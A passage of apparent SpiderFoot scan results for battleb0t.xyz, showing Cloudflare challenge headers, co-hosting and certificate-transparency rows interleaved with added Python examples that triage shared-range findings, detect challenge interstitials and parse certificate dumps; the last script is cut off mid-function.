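        net = ipaddress.ip_network(addr_or_cidr, strict=False)  # a bare IP becomes a /32
    except ValueError:
        return None
    for owner, ranges in SHARED_RANGES.items():
        if any(net.version == r.version and net.subnet_of(r) for r in ranges):
            return owner
    return None


def triage(findings: list[Finding]) -> list[tuple[Finding, str, str]]:
    """Attach (confidence, reason) to each finding."""
    out = []
    for f in findings:
        owner = shared_owner(f.source)
        if owner and f.ftype in NEIGHBOUR_TYPES:
            out.append((f, "low", f"{f.ftype} on shared range ({owner}); other tenants' reputation is not the target's"))
        elif f.risky:
            out.append((f, "keep", "risky data type on an address not known to be shared"))
        else:
            out.append((f, "info", "no reputation claim"))
    return out


if __name__ == "__main__":
    for f, confidence, reason in triage(FINDINGS):
        print(f"{confidence:5} {f.ftype:32} {f.source:18} {reason}")
```

The ranges are deliberately a configuration value: the same down-ranking applies to any anycast CDN, shared hosting or cloud load-balancer block, and the list should be built from the BGP AS Membership rows of the scan rather than hard-coded.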
| 2023-05-12 02:44:18 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | .container{width:100%}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-center{background-position:50%}.bg-no-repeat{background-repeat:no-repeat}.border-gray-300{--border-opacity:1;border-color:#ebebeb;border-color:rgba(235,235,235,var(--border-opacity))}.rounded{border-radius:.25rem}.border-solid{border-style:solid}.border-0{border-width:0}.border{border-width:1px}.border-t{border-top-width:1px}.cursor-pointer{cursor:pointer}.block{display:block}.inline-block{display:inline-block}.table{display:table}.hidden{display:none}.float-left{float:left}.clearfix:after{content:"";display:table;clear:both}.font-mono{font-family:monaco,courier,monospace}.font-light{font-weight:300}.font-normal{font-weight:400}.font-semibold{font-weight:600}.h-12{height:3rem}.h-20{height:5rem}.text-13{font-size:13px}.text-15{font-size:15px}.text-60{font-size:60px}.text-2xl{font-size:1.5rem}.text-3xl{font-size:1.875rem}.leading-tight{line-height:1.25}.leading-normal{line-height:1.5}.leading-relaxed{line-height:1.625}.leading-1\.3{line-height:1.3}.my-8{margin-top:2rem;margin-bottom:2rem}.mx-auto{margin-left:auto;margin-right:auto}.mr-2{margin-right:.5rem}.mb-2{margin-bottom:.5rem}.mt-3{margin-top:.75rem}.mb-4{margin-bottom:1rem}.ml-4{margin-left:1rem}.mt-6{margin-top:1.5rem}.mb-6{margin-bottom:1.5rem}.mb-8{margin-bottom:2rem}.mb-10{margin-bottom:2.5rem}.ml-10{margin-left:2.5rem}.mb-15{margin-bottom:3.75rem}.-ml-6{margin-left:-1.5rem}.overflow-hidden{overflow:hidden}.p-0{padding:0}.py-2{padding-top:.5rem;padding-bottom:.5rem}.px-4{padding-left:1rem;padding-right:1rem}.py-8{padding-top:2rem;padding-bottom:2rem}.py-10{padding-top:2.5rem;padding-bottom:2.5rem}.py-15{padding-top:3.75rem;padding-bottom:3.75rem}.pr-6{padding-right:1.5rem}.pt-10{padding-top:2.5rem}.absolute{position:absolute}.relative{position:relative}.left-1\/2{left:50%}.-bottom-4{bottom:-1rem}.resize{res
ize:both}.text-center{text-align:center}.text-black-dark{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#999;color:rgba(153,153,153,var(--text-opacity))}.text-red-error{--text-opacity:1;color:#bd2426;color:rgba(189,36,38,var(--text-opacity))}.text-green-success{--text-opacity:1;color:#9bca3e;color:rgba(155,202,62,var(--text-opacity))}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.w-12{width:3rem}.w-240{width:60rem}.w-1\/2{width:50%}.w-1\/3{width:33.333333%}.w-full{width:100%}.transition{-webkit-transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,-webkit-transform}body,html{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity));-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-size:16px}*,body,html{margin:0;padding:0}*{box-sizing:border-box}a{--text-opacity:1;color:#2f7bbf;color:rgba(47,123,191,var(--text-opacity));text-decoration:none;-webkit-transition-property:all;transition-property:all;-webkit-transition-duration:.15s;transition-duration:.15s;-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);transition-timing-function:cubic-bezier(0,0,.2,1)}a:hover{--text-opacity:1;color:#f68b1f;color:rgba(246,139,31,var(--text-opacity))}img{display:block;width:100%;height:auto}#what-happened-section 
p{font-size:15px;line-height:1.5}strong{font-weight:600}.bg-gradient-gray{background-image:-webkit-linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}.cf-error-source:after{position:absolute;--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity));width:2.5rem;height:2.5rem;--transform-translate-x:0;--transform-translate-y:0;--transform-rotate:0;--transform-skew-x:0;--transform-skew-y:0;--transform-scale-x:1;--transform-scale-y:1;-webkit-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));-ms-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));--transform-rotate:45deg;content:"";bottom:-1.75rem;left:50%;margin-left:-1.25rem;box-shadow:0 0 4px 4px #dedede}@media screen and (max-width:720px){.cf-error-source:after{display:none}}.cf-icon-browser{background-image:url(/cdn-cgi/images/cf-icon-browser.png)}.cf-icon-cloud{background-image:url(/cdn-cgi/images/cf-icon-cloud.png)}.cf-icon-server{background-image:url(/cdn-cgi/images/cf-icon-server.png)}.cf-icon-ok{background-image:url(/cdn-cgi/images/cf-icon-ok.png)}.cf-icon-error{background-image:url(/cdn-cgi/images/cf-icon-error.png)}#cf-wrapper .feedback-hidden{display:none}#cf-wrapper .feedback-success{min-height:33px;line-height:33px}#cf-wrapper 
.cf-button{color:#0051c3;font-size:13px;border-color:#0045a6;-webkit-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.2s;transition-duration:.2s;-webkit-transition-property:background-color,border-color,color;transition-property:background-color,border-color,color}#cf-wrapper .cf-button:hover{color:#fff;background-color:#003681}.cf-error-footer .hidden{display:none}.cf-error-footer .cf-footer-ip-reveal-btn{-webkit-appearance:button;-moz-appearance:button;appearance:button;text-decoration:none;background:none;color:inherit;border:none;padding:0;font:inherit;cursor:pointer;color:#0051c3;-webkit-transition:color .15s ease;transition:color .15s ease}.cf-error-footer .cf-footer-ip-reveal-btn:hover{color:#ee730a}.code-label{background-color:#d9d9d9;color:#313131;font-weight:500;border-radius:1.25rem;font-size:.75rem;line-height:4.5rem;padding:.25rem .5rem;height:4.5rem;white-space:nowrap;vertical-align:middle}@media (max-width:639px){.sm\:block{display:block}.sm\:hidden{display:none}.sm\:mb-1{margin-bottom:.25rem}.sm\:mb-2{margin-bottom:.5rem}.sm\:py-4{padding-top:1rem;padding-bottom:1rem}.sm\:px-8{padding-left:2rem;padding-right:2rem}.sm\:text-left{text-align:left}}@media (max-width:720px){.md\:border-gray-400{--border-opacity:1;border-color:#dedede;border-color:rgba(222,222,222,var(--border-opacity))}.md\:border-solid{border-style:solid}.md\:border-0{border-width:0}.md\:border-b{border-bottom-width:1px}.md\:block{display:block}.md\:inline-block{display:inline-block}.md\:hidden{display:none}.md\:float-none{float:none}.md\:text-3xl{font-size:1.875rem}.md\:m-0{margin:0}.md\:mt-0{margin-top:0}.md\:mb-2{margin-bottom:.5rem}.md\:p-0{padding:0}.md\:py-8{padding-top:2rem;padding-bottom:2rem}.md\:px-8{padding-left:2rem;padding-right:2rem}.md\:pr-0{padding-right:0}.md\:pb-10{padding-bottom:2.5rem}.md\:top-0{top:0}.md\:right-0{right:0}.md\:left-auto{left:auto}.md\:text-left{text-align:left}.md\:w-full{width:100%}}@media 
(max-width:1023px){.lg\:text-sm{font-size:.875rem}.lg\:text-2xl{font-size:1.5rem}.lg\:text-4xl{font-size:2.25rem}.lg\:leading-relaxed{line-height:1.625}.lg\:px-8{padding-left:2rem;padding-right:2rem}.lg\:pt-6{padding-top:1.5rem}.lg\:w-full{width:100%}}
| http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
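The Web Server, Non-Standard HTTP Header and Web Content rows above were captured from a Cloudflare challenge interstitial, not from the origin: cf-mitigated: challenge, a 1970 Expires, no-store caching and a stylesheet under /cdn-cgi/ full of .cf-error-source and #cf-wrapper rules are all Cloudflare's own. The security headers in those rows (COOP, COEP, CORP, Permissions-Policy, X-Frame-Options) therefore describe the challenge page and must not be credited to the application behind it. The script below is an added example, not SpiderFoot's module code; CAPTURED_HEADERS is a constructed subset of the response recorded on this page, with the report-to endpoint URL shortened.

```python
"""Classify a captured HTTP response: origin content, or a Cloudflare
challenge interstitial?  Added example; not SpiderFoot module code.
CAPTURED_HEADERS is a constructed subset of the response on this page.
"""
from __future__ import annotations

from urllib.parse import urlsplit

CAPTURED_HEADERS = {
    "server": "cloudflare",
    "cf-ray": "7c5f8c594cb34339-EWR",
    "cf-mitigated": "challenge",
    "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate",
    "expires": "Thu, 01 Jan 1970 00:00:01 GMT",
    "content-type": "text/html; charset=UTF-8",
    "x-frame-options": "SAMEORIGIN",
    "referrer-policy": "same-origin",
    "permissions-policy": "camera=(),geolocation=(),microphone=(),payment=(),usb=()",
    "cross-origin-opener-policy": "same-origin",
    "cross-origin-embedder-policy": "require-corp",
    "cross-origin-resource-policy": "same-origin",
    "nel": '{"success_fraction":0,"report_to":"cf-nel","max_age":604800}',
    "report-to": '{"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v3?s=..."}],"group":"cf-nel","max_age":604800}',
    "alt-svc": 'h3=":443"; ma=86400, h3-29=":443"; ma=86400',
}

# Set by Cloudflare's edge on proxied responses; they say nothing about the origin.
EDGE_HEADERS = {"server", "cf-ray", "cf-mitigated", "cf-cache-status", "nel", "report-to", "alt-svc"}

# Browser security headers an assessment would normally score.
SECURITY_HEADERS = {
    "content-security-policy", "strict-transport-security", "x-frame-options",
    "x-content-type-options", "referrer-policy", "permissions-policy",
    "cross-origin-opener-policy", "cross-origin-embedder-policy",
    "cross-origin-resource-policy",
}


def classify_response(headers: dict[str, str]) -> dict:
    """Say what the header set shows and which headers may be attributed to the origin."""
    h = {k.lower(): v for k, v in headers.items()}
    behind_cloudflare = h.get("server", "").lower() == "cloudflare" or "cf-ray" in h
    # cf-mitigated: challenge marks Cloudflare's managed/JS challenge page; its body
    # is Cloudflare HTML and the request never reached the origin.
    challenge_page = h.get("cf-mitigated", "").lower() == "challenge"
    security = sorted(k for k in h if k in SECURITY_HEADERS)
    cf_ray = h.get("cf-ray", "")
    return {
        "behind_cloudflare": behind_cloudflare,
        "challenge_page": challenge_page,
        "edge_headers": sorted(k for k in h if k in EDGE_HEADERS),
        "security_headers": security,
        # Credit security headers to the origin only when no interstitial intervened.
        "security_headers_attributable_to_origin": [] if challenge_page else security,
        # The cf-ray suffix is the edge data centre that answered (EWR here), not the origin's location.
        "cf_ray_colo": cf_ray.rsplit("-", 1)[-1] if "-" in cf_ray else None,
    }


def is_edge_asset(url: str) -> bool:
    """/cdn-cgi/ is reserved by Cloudflare for its own assets (challenge and error pages)."""
    return urlsplit(url).path.startswith("/cdn-cgi/")


if __name__ == "__main__":
    print(classify_response(CAPTURED_HEADERS))
    print(is_edge_asset("http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css"))
```

When a scan shows challenge_page True, re-run the web spider and header modules with a client that can pass the challenge, or accept that every Web Content, Web Server and header finding for that host describes Cloudflare rather than the target.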
| 2023-05-12 02:47:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
| battleb0t.xyz |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:49:55.813 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:86:06:13:D6:59:74:98:67:AB:1E:5E:
35:81:72:04:C0:6A:1F:FC:7B:00:6F:B8:03:F1:BE:1B:
95:AB:B8:28:27:02:21:00:BC:93:E5:D5:C0:AB:C3:D9:
F0:70:98:2F:0B:66:FF:CE:EB:B1:93:B5:AF:E3:EC:E5:
24:C0:E0:01:07:FE:3F:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 27 18:49:55.791 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:AA:37:8F:C9:30:00:92:D7:56:A4:
B6:CE:F3:F5:CF:29:81:16:83:11:DE:9E:A3:05:67:53:
91:6D:18:E7:A8:02:21:00:D8:7E:2B:BA:15:47:72:19:
DF:D8:EF:24:B0:25:79:A1:48:F8:3A:2F:C8:FB:0A:50:
3F:7F:81:1E:4F:CF:9B:26
Signature Algorithm: sha256WithRSAEncryption
54:17:5d:50:fa:47:51:89:f1:3d:5a:36:e8:d7:6e:d8:ae:85:
fe:d5:2e:dc:14:36:b2:f3:63:e0:57:da:ee:7f:c4:31:c7:24:
a6:e1:02:c4:6d:d7:20:80:18:28:5b:5e:4a:05:31:14:72:9e:
66:88:fd:41:57:c0:d0:ff:22:13:fd:7e:a3:d9:75:17:b4:67:
19:9a:e9:16:5e:44:4f:78:33:3a:4e:54:5f:6f:68:3b:1c:af:
d6:db:9b:bd:2a:b2:ea:76:7b:55:8a:a5:42:70:bd:16:d6:9e:
36:d7:56:22:2c:f3:d5:18:19:3e:f8:18:e5:da:a9:4e:03:a9:
13:d9:fb:8a:01:6e:70:f3:d9:fb:a9:8f:9a:38:b9:d7:89:2c:
9a:59:0a:bf:e9:71:d6:1c:2b:eb:93:fd:5b:0d:32:8d:ce:21:
6b:4e:a0:7b:68:bb:1b:49:02:64:07:cd:71:b7:fa:23:e8:c5:
12:86:a7:7c:6b:b8:cf:88:07:9a:b1:b0:e7:e8:80:0a:54:1c:
15:61:1e:50:90:fa:7e:93:82:0d:40:bf:16:d5:1e:1e:93:9f:
58:6f:56:5d:6c:49:c2:36:9e:81:7f:0e:32:d4:68:dd:6c:03:
64:48:28:01:66:a7:85:1f:9a:be:92:2f:5f:75:fe:d1:ff:94:
e2:b4:07:7b
|
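The two certificate rows above are openssl-style text dumps of Let's Encrypt end-entity certificates for fluid.battleb0t.xyz and vscode.battleb0t.xyz. What a reviewer wants from such rows is a mechanical triage: was the certificate still inside its validity window at the scan timestamp (2023-05-12), does the CN appear in the SAN, is it an end-entity certificate, is the key size reasonable, and does it carry at least two SCTs (the minimum Chrome's CT policy expects for a 90-day certificate). The following is an added example, not part of the scan tool's output or the page; it parses the dump layout shown above. The two sample strings are constructed, abbreviated copies of the dumps on the page (moduli, signatures and SCT signature bytes removed), keeping the field values as they appear there; SCAN_TIME is taken from the row timestamp.

```python
"""Triage of openssl-style certificate text dumps (added example)."""
import re
from datetime import datetime, timezone

# Timestamp of the Certificate Transparency row on the page, in UTC.
SCAN_TIME = datetime(2023, 5, 12, 2, 47, 42, tzinfo=timezone.utc)

# Constructed, abbreviated copies of the two dumps on the page.
SAMPLE_DUMPS = [
    """Certificate:
    Data:
    Version: 3 (0x2)
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: C=US, O=Let's Encrypt, CN=R3
    Validity
    Not Before: Feb 24 03:02:53 2023 GMT
    Not After : May 25 03:02:52 2023 GMT
    Subject: CN=fluid.battleb0t.xyz
    Public Key Algorithm: rsaEncryption
    RSA Public-Key: (2048 bit)
    X509v3 Basic Constraints: critical
    CA:FALSE
    X509v3 Subject Alternative Name:
    DNS:fluid.battleb0t.xyz
    CT Precertificate SCTs:
    Signed Certificate Timestamp:
    Timestamp : Feb 24 04:02:53.639 2023 GMT
    Signed Certificate Timestamp:
    Timestamp : Feb 24 04:02:53.699 2023 GMT
    """,
    """Certificate:
    Data:
    Version: 3 (0x2)
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: C=US, O=Let's Encrypt, CN=R3
    Validity
    Not Before: Jan 27 17:49:55 2023 GMT
    Not After : Apr 27 17:49:54 2023 GMT
    Subject: CN=vscode.battleb0t.xyz
    Public Key Algorithm: rsaEncryption
    RSA Public-Key: (4096 bit)
    X509v3 Basic Constraints: critical
    CA:FALSE
    X509v3 Subject Alternative Name:
    DNS:vscode.battleb0t.xyz
    CT Precertificate SCTs:
    Signed Certificate Timestamp:
    Timestamp : Jan 27 18:49:55.813 2023 GMT
    Signed Certificate Timestamp:
    Timestamp : Jan 27 18:49:55.791 2023 GMT
    """,
]

OPENSSL_TIME = "%b %d %H:%M:%S %Y GMT"


def _field(text, pattern):
    """Return the first capture group of a line-anchored regex, or None."""
    m = re.search(pattern, text, re.MULTILINE)
    return m.group(1).strip() if m else None


def _parse_time(value):
    # openssl pads single-digit days with a space; collapse runs of whitespace.
    return datetime.strptime(re.sub(r"\s+", " ", value), OPENSSL_TIME).replace(tzinfo=timezone.utc)


def parse_cert_dump(text):
    """Pull the fields needed for triage out of an openssl -text style dump."""
    san_line = _field(text, r"^\s*(DNS:.+)$") or ""
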